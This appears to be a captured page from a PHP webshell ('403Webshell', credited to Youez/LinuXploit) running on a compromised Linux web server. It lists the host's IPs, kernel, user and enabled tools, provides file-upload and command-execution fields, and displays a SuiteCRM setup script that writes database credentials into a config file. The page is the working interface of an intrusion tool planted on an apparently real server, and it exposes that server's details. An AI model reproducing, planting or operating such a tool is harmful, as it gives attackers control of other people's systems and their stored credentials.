403Webshell
Server IP : 172.67.220.81  /  Your IP : 216.73.216.41
Web Server : Apache
System : Linux semi1.us.cloudlogin.co 5.10.244-xeon-hst #1 SMP Sun Sep 14 17:09:20 UTC 2025 x86_64
User : xessglobal ( 271017)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : ON
Directory :  /proc/self/root/usr/local/ei2/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/local/ei2/suitcrm.php
<?php
include('public/legacy/config.php');

$c = $sugar_config['dbconfig'];

/*
$str = "DATABASE_URL=\"mysql://{$c['db_user_name']}:{$c['db_password']}@localhost/{$c['db_name']}\"";
file_put_contents('.env.local', $str);
 */

$str = <<<STR
<?php
return array (
		'APP_ENV' => 'prod',
		'CORS_ALLOW_ORIGIN' => '^https?://(localhost|127\\.0\\.0\\.1)(:[0-9]+)?$',
		'DATABASE_URL' => 'mysql://{$c['db_user_name']}:{$c['db_password']}@localhost/{$c['db_name']}',
		'AUTH_TYPE' => 'native',
		'LOCK_DSN' => 'flock',
		'LOGIN_THROTTLING_MAX_ATTEMPTS' => '5',
	);
STR;
file_put_contents('.env.local.php', $str);


file_put_contents('index.php', "<?php header('location: public/'); ?>");

Youez - 2016 - github.com/yon3zu
LinuXploit